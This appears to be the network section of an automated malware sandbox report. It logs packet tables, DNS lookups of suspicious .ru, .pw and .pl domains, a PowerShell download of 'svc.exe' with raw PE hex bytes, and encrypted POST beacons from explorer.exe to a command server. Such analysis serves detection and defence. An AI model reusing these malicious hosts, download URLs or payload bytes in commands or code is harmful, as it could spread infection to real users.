                                                                                                                          Oct 4, 2024 15:10:30.557183027 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.557365894 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.557368040 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.557625055 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.557637930 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.557652950 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.557858944 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.558010101 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.558010101 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.604875088 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.622235060 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.622251987 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.622263908 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.622452021 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.622464895 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.622474909 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.622478008 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.622490883 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.622531891 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.622531891 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.622775078 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.622786045 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.622797966 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.622843027 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.622843027 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.622940063 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.623594999 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.623651981 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.623716116 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.623727083 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.623967886 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.689697027 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.689713955 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.689726114 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.689831018 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.689877033 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.689889908 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.689903021 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.689949989 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.689949989 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.690301895 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.690315008 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.690327883 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.690418005 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.690459967 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.690536022 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.690896034 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.690908909 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.690922022 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.691059113 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.691281080 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.691294909 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.691406965 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.691612959 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.691664934 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.691699028 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.745697021 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.769375086 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.769390106 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.769479036 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.825740099 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.825757027 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.825772047 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.825793028 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.825808048 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.825814009 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.825822115 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.825958967 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.826112032 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.826126099 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.826137066 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.826148987 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.826179981 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.826241970 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.826642990 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.826654911 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.826667070 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.826703072 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.827311039 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.827330112 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.827339888 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.827377081 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.827433109 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.891549110 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.891575098 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.891587973 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.891647100 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.891659975 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.891690016 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.891690016 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.891801119 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.891814947 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.891828060 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.891849995 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.891902924 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:30.891952038 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.891963005 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:30.892079115 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:31.022522926 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:31.022543907 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:31.022572994 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:31.022593021 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:31.022610903 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:31.022624016 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:31.022655010 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:31.022667885 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:31.022680998 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:31.022691965 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:31.022694111 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:31.022708893 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:31.022723913 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:31.022773981 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:31.022773981 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:31.023053885 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:31.023789883 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:31.024101973 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:31.088969946 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:31.088988066 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:31.089000940 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:31.089016914 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:31.089030981 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:31.089256048 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:31.089485884 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:31.089646101 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:31.092139959 CEST4970380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:31.101937056 CEST8049703193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:59.819365025 CEST4971080192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:59.824373007 CEST8049710193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:59.824718952 CEST4971080192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:59.824718952 CEST4971080192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:59.824718952 CEST4971080192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:10:59.829781055 CEST8049710193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:59.829794884 CEST8049710193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:11:00.938776970 CEST8049710193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:11:00.938868999 CEST8049710193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:11:00.938930988 CEST4971080192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:11:01.000483990 CEST4971080192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:11:01.005250931 CEST8049710193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:11:01.476128101 CEST4971180192.168.2.10188.40.141.211
                                                                                                                          Oct 4, 2024 15:11:01.481771946 CEST8049711188.40.141.211192.168.2.10
                                                                                                                          Oct 4, 2024 15:11:01.481903076 CEST4971180192.168.2.10188.40.141.211
                                                                                                                          Oct 4, 2024 15:11:01.482055902 CEST4971180192.168.2.10188.40.141.211
                                                                                                                          Oct 4, 2024 15:11:01.482085943 CEST4971180192.168.2.10188.40.141.211
                                                                                                                          Oct 4, 2024 15:11:01.487318039 CEST8049711188.40.141.211192.168.2.10
                                                                                                                          Oct 4, 2024 15:11:01.487330914 CEST8049711188.40.141.211192.168.2.10
                                                                                                                          Oct 4, 2024 15:11:02.320158005 CEST8049711188.40.141.211192.168.2.10
                                                                                                                          Oct 4, 2024 15:11:02.326832056 CEST4971180192.168.2.10188.40.141.211
                                                                                                                          Oct 4, 2024 15:11:02.326869965 CEST4971180192.168.2.10188.40.141.211
                                                                                                                          Oct 4, 2024 15:11:02.332215071 CEST8049711188.40.141.211192.168.2.10
                                                                                                                          Oct 4, 2024 15:11:02.332324982 CEST8049711188.40.141.211192.168.2.10
                                                                                                                          Oct 4, 2024 15:11:02.529197931 CEST8049711188.40.141.211192.168.2.10
                                                                                                                          Oct 4, 2024 15:11:02.573844910 CEST4971180192.168.2.10188.40.141.211
                                                                                                                          Oct 4, 2024 15:11:27.244211912 CEST4971380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:11:27.253375053 CEST8049713193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:11:27.253521919 CEST4971380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:11:27.253731966 CEST4971380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:11:27.253731966 CEST4971380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:11:27.262788057 CEST8049713193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:11:27.263977051 CEST8049713193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:11:28.362041950 CEST8049713193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:11:28.362112999 CEST8049713193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:11:28.362202883 CEST4971380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:11:28.363143921 CEST4971380192.168.2.10193.46.217.78
                                                                                                                          Oct 4, 2024 15:11:28.365392923 CEST4971180192.168.2.10188.40.141.211
                                                                                                                          Oct 4, 2024 15:11:28.365392923 CEST4971180192.168.2.10188.40.141.211
                                                                                                                          Oct 4, 2024 15:11:28.368098021 CEST8049713193.46.217.78192.168.2.10
                                                                                                                          Oct 4, 2024 15:11:28.370214939 CEST8049711188.40.141.211192.168.2.10
                                                                                                                          Oct 4, 2024 15:11:28.370240927 CEST8049711188.40.141.211192.168.2.10
                                                                                                                          Oct 4, 2024 15:11:28.558135033 CEST8049711188.40.141.211192.168.2.10
                                                                                                                          Oct 4, 2024 15:11:28.563607931 CEST4971180192.168.2.10188.40.141.211
                                                                                                                          Oct 4, 2024 15:11:28.563641071 CEST4971180192.168.2.10188.40.141.211
                                                                                                                          Oct 4, 2024 15:11:28.572530031 CEST8049711188.40.141.211192.168.2.10
                                                                                                                          Oct 4, 2024 15:11:28.572958946 CEST8049711188.40.141.211192.168.2.10
                                                                                                                          Oct 4, 2024 15:11:28.773679018 CEST8049711188.40.141.211192.168.2.10
                                                                                                                          Oct 4, 2024 15:11:28.823919058 CEST4971180192.168.2.10188.40.141.211
                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Oct 4, 2024 15:10:26.644543886 CEST6009953192.168.2.101.1.1.1
                                                                                                                          Oct 4, 2024 15:10:27.063606024 CEST53600991.1.1.1192.168.2.10
                                                                                                                          Oct 4, 2024 15:10:59.571042061 CEST6250353192.168.2.101.1.1.1
                                                                                                                          Oct 4, 2024 15:10:59.818275928 CEST53625031.1.1.1192.168.2.10
                                                                                                                          Oct 4, 2024 15:11:01.002840042 CEST5116253192.168.2.101.1.1.1
                                                                                                                          Oct 4, 2024 15:11:01.474363089 CEST53511621.1.1.1192.168.2.10
                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                          Oct 4, 2024 15:10:26.644543886 CEST192.168.2.101.1.1.10x5141Standard query (0)bestmagazineforanimalsunicum.ruA (IP address)IN (0x0001)false
                                                                                                                          Oct 4, 2024 15:10:59.571042061 CEST192.168.2.101.1.1.10x49d8Standard query (0)unicexpertmagazine.pwA (IP address)IN (0x0001)false
                                                                                                                          Oct 4, 2024 15:11:01.002840042 CEST192.168.2.101.1.1.10x4654Standard query (0)ceoconstractionstore.plA (IP address)IN (0x0001)false
                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                          Oct 4, 2024 15:10:27.063606024 CEST1.1.1.1192.168.2.100x5141No error (0)bestmagazineforanimalsunicum.ru193.46.217.78A (IP address)IN (0x0001)false
                                                                                                                          Oct 4, 2024 15:10:59.818275928 CEST1.1.1.1192.168.2.100x49d8No error (0)unicexpertmagazine.pw193.46.217.78A (IP address)IN (0x0001)false
                                                                                                                          Oct 4, 2024 15:11:01.474363089 CEST1.1.1.1192.168.2.100x4654No error (0)ceoconstractionstore.pl188.40.141.211A (IP address)IN (0x0001)false
                                                                                                                          • bestmagazineforanimalsunicum.ru
                                                                                                                          • dneagbdmtkktop.org
                                                                                                                            • unicexpertmagazine.pw
                                                                                                                          • gspupvuevfny.net
                                                                                                                            • ceoconstractionstore.pl
                                                                                                                          • nqgjgifqepqt.com
                                                                                                                          • biegpmdfbwuaocv.org
                                                                                                                          • xcltdjfoaardilo.net
                                                                                                                          • ebsdyhoseklppw.com
                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.1049703193.46.217.78807248C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 4, 2024 15:10:27.079555035 CEST97OUTGET /download/svc.exe HTTP/1.1
                                                                                                                          Host: bestmagazineforanimalsunicum.ru
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Oct 4, 2024 15:10:28.037300110 CEST1236INHTTP/1.1 200 OK
                                                                                                                          Server: nginx/1.18.0
                                                                                                                          Date: Fri, 04 Oct 2024 13:10:27 GMT
                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                          Content-Length: 222720
                                                                                                                          Connection: close
                                                                                                                          Last-Modified: Wed, 02 Oct 2024 05:06:08 GMT
                                                                                                                          ETag: "36600-62377654eb000"
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 06 d2 fc 49 42 b3 92 1a 42 b3 92 1a 42 b3 92 1a 5c e1 16 1a 5e b3 92 1a 5c e1 07 1a 51 b3 92 1a 5c e1 11 1a 1e b3 92 1a 65 75 e9 1a 45 b3 92 1a 42 b3 93 1a 32 b3 92 1a 5c e1 18 1a 43 b3 92 1a 5c e1 06 1a 43 b3 92 1a 5c e1 03 1a 43 b3 92 1a 52 69 63 68 42 b3 92 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 1e 60 49 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 80 01 00 00 64 11 00 00 00 00 00 16 17 00 00 00 10 00 00 00 90 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 13 00 00 04 00 00 03 a2 03 00 02 00 00 80 00 00 [TRUNCATED]
                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$IBBB\^\Q\euEB2\C\C\CRichBPEL`Ied@DPPX.text~ `.rdata" "@@.data@.tls@@.rsrcP@@
                                                                                                                          Oct 4, 2024 15:10:28.037318945 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 0d 08 c0 41 00 75 02 f3 c3 e9 11 07 00 00 6a 0c 68 90 a4 41 00 e8 05 15 00 00 8b 75 08 85 f6 74
                                                                                                                          Data Ascii: ;AujhAutu=?QuCjYeVYEtVP>YYE}u7ujYVj5AAuhAPYUQeVEPuuUu9E
                                                                                                                          Oct 4, 2024 15:10:28.037331104 CEST1236INData Raw: 00 83 7d 10 00 75 28 89 1d 70 d7 41 00 6a 08 e8 96 04 00 00 59 ff 75 08 e8 fc fd ff ff 33 db 43 83 7d 10 00 74 08 6a 08 e8 7d 04 00 00 59 c3 e8 8e 10 00 00 c3 8b ff 55 8b ec 6a 00 6a 00 ff 75 08 e8 c3 fe ff ff 83 c4 0c 5d c3 8b ff 55 8b ec 6a 00
                                                                                                                          Data Ascii: }u(pAjYu3C}tj}YUjju]Ujju]jjjjjjVV8Vp8V&VU8V@8V(6V4V4h@&$A^U=|Au1ua/h'Y
                                                                                                                          Oct 4, 2024 15:10:28.037444115 CEST1236INData Raw: db 39 1d a4 da 41 00 75 18 e8 12 2d 00 00 6a 1e e8 60 2b 00 00 68 ff 00 00 00 e8 26 f9 ff ff 59 59 8b 75 08 8d 34 f5 88 c1 41 00 39 1e 74 04 8b c7 eb 6e 6a 18 e8 5f 3b 00 00 59 8b f8 3b fb 75 0f e8 ab fe ff ff c7 00 0c 00 00 00 33 c0 eb 51 6a 0a
                                                                                                                          Data Ascii: 9Au-j`+h&YYu4A9tnj_;Y;u3QjYY]9u,hW3YYuW"Yu]>WYEEHj(YUEV4A>uP"YujY6A^]U?Q?Q
                                                                                                                          Oct 4, 2024 15:10:28.037456989 CEST896INData Raw: 8b c6 5f 5e c3 8b ff 55 8b ec 51 51 8b 4d 08 8b 41 08 53 56 8b 71 10 57 33 db eb 03 03 c0 43 85 c0 7d f9 8b c3 69 c0 04 02 00 00 8d 84 30 44 01 00 00 6a 3f 89 45 f8 5a 89 40 08 89 40 04 83 c0 08 4a 75 f4 6a 04 8b fb 68 00 10 00 00 c1 e7 0f 03 79
                                                                                                                          Data Ascii: _^UQQMASVqW3C}i0Dj?EZ@@JujhyhWAupU;wC+GAH@PIuUEOHAJHAdD3GFCENC
                                                                                                                          Oct 4, 2024 15:10:28.037883997 CEST1236INData Raw: 04 3b 4b 08 75 57 8a 4c 06 04 88 4d 0f fe c1 88 4c 06 04 83 fe 20 73 1c 80 7d 0f 00 75 0e 8b ce bf 00 00 00 80 d3 ef 8b 4d 08 09 39 8d 44 90 44 8b ce eb 20 80 7d 0f 00 75 10 8d 4e e0 bf 00 00 00 80 d3 ef 8b 4d 08 09 79 04 8d 84 90 c4 00 00 00 8d
                                                                                                                          Data Ascii: ;KuWLML s}uM9DD }uNMyNED3@_^[U?QMk?QMSI VW}M3U?QS;#U#u];r;u?QS;#U#u
                                                                                                                          Oct 4, 2024 15:10:28.037897110 CEST1236INData Raw: 58 0c 74 12 68 08 c0 41 00 57 8b d3 8b c8 e8 e2 33 00 00 8b 45 0c 8b 4d f8 89 48 0c 8b 06 83 f8 fe 74 0d 8b 4e 04 03 cf 33 0c 38 e8 31 e9 ff ff 8b 4e 0c 8b 56 08 03 cf 33 0c 3a e8 21 e9 ff ff 8b 45 f0 8b 48 08 8b d7 e8 75 33 00 00 ba fe ff ff ff
                                                                                                                          Data Ascii: XthAW3EMHtN381NV3:!EHu39SRhAW3jhAM3;v.jX3;E@u3WWWWW3Mu;u3F3]wi=?QuKuE;?Qw7jY}
                                                                                                                          Oct 4, 2024 15:10:28.037908077 CEST1236INData Raw: 0f b6 03 3b c8 77 16 2b c1 40 50 8d 94 0d fc fe ff ff 6a 20 52 e8 23 2f 00 00 83 c4 0c 43 8a 03 43 84 c0 75 d8 6a 00 ff 76 0c 8d 85 fc fa ff ff ff 76 04 50 57 8d 85 fc fe ff ff 50 6a 01 6a 00 e8 11 36 00 00 33 db 53 ff 76 04 8d 85 fc fd ff ff 57
                                                                                                                          Data Ascii: ;w+@Pj R#/CCujvvPWPjj63SvWPWPWvS3DSvWPWPhvS3$3EtLtL @;rV3)
                                                                                                                          Oct 4, 2024 15:10:28.037919044 CEST1236INData Raw: 90 41 00 ff d7 f6 46 70 02 0f 85 ea 00 00 00 f6 05 cc c7 41 00 01 0f 85 dd 00 00 00 6a 0d e8 bd e9 ff ff 59 83 65 fc 00 8b 43 04 a3 0c dc 41 00 8b 43 08 a3 10 dc 41 00 8b 43 0c a3 14 dc 41 00 33 c0 89 45 e4 83 f8 05 7d 10 66 8b 4c 43 10 66 89 0c
                                                                                                                          Data Ascii: AFpAjYeCACACA3E}fLCfEA@3E=}LA@3E=}A@5AAuA=AtPYASE0j6Y%u AtSY4
                                                                                                                          Oct 4, 2024 15:10:28.037930012 CEST896INData Raw: 85 c0 74 21 a1 c0 c8 41 00 83 f8 ff 74 17 50 ff 35 c4 c8 41 00 ff d6 ff d0 85 c0 74 08 8b 80 fc 01 00 00 eb 27 be 80 92 41 00 56 ff 15 2c 90 41 00 85 c0 75 0b 56 e8 e2 dc ff ff 59 85 c0 74 18 68 9c 92 41 00 50 ff 15 6c 90 41 00 85 c0 74 08 ff 75
                                                                                                                          Data Ascii: t!AtP5At'AV,AuVYthAPlAtuEE^]AV5AAu5@AeYV5AA^AtP5HA;YAAtPAAjhA!AV,Au
                                                                                                                          Oct 4, 2024 15:10:28.042684078 CEST1236INData Raw: c3 8b ff 56 57 be 80 92 41 00 56 ff 15 2c 90 41 00 85 c0 75 07 56 e8 82 d9 ff ff 59 8b f8 85 ff 0f 84 5e 01 00 00 8b 35 6c 90 41 00 68 cc 92 41 00 57 ff d6 68 c0 92 41 00 57 a3 3c dc 41 00 ff d6 68 b4 92 41 00 57 a3 40 dc 41 00 ff d6 68 ac 92 41
                                                                                                                          Data Ascii: VWAV,AuVY^5lAhAWhAW<AhAW@AhAWDA=<A5AHAt=@At=DAtu$A@AA<Ay5@5DAHAAA5@AP5<A5@A<A5DA


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.2.1049710193.46.217.78803968C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 4, 2024 15:10:59.824718952 CEST289OUTPOST /index.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://dneagbdmtkktop.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 124
                                                                                                                          Host: unicexpertmagazine.pw
                                                                                                                          Oct 4, 2024 15:10:59.824718952 CEST124OUTData Raw: a1 5f 7c 5e 85 4a 2c cb c0 4d a7 b7 fd c9 2f 49 5c 33 ce 29 60 c0 43 23 a1 54 ca 6f 71 8f 03 5d ba 56 d8 fe 3d a5 00 38 5e b9 cd 07 a8 44 1c 4d a6 60 28 1e cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be ac 36 4a b8
                                                                                                                          Data Ascii: _|^J,M/I\3)`C#Toq]V=8^DM`(2m-^JrC)6J>NNqzVfU)Bow
                                                                                                                          Oct 4, 2024 15:11:00.938776970 CEST602INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.18.0
                                                                                                                          Date: Fri, 04 Oct 2024 13:11:00 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
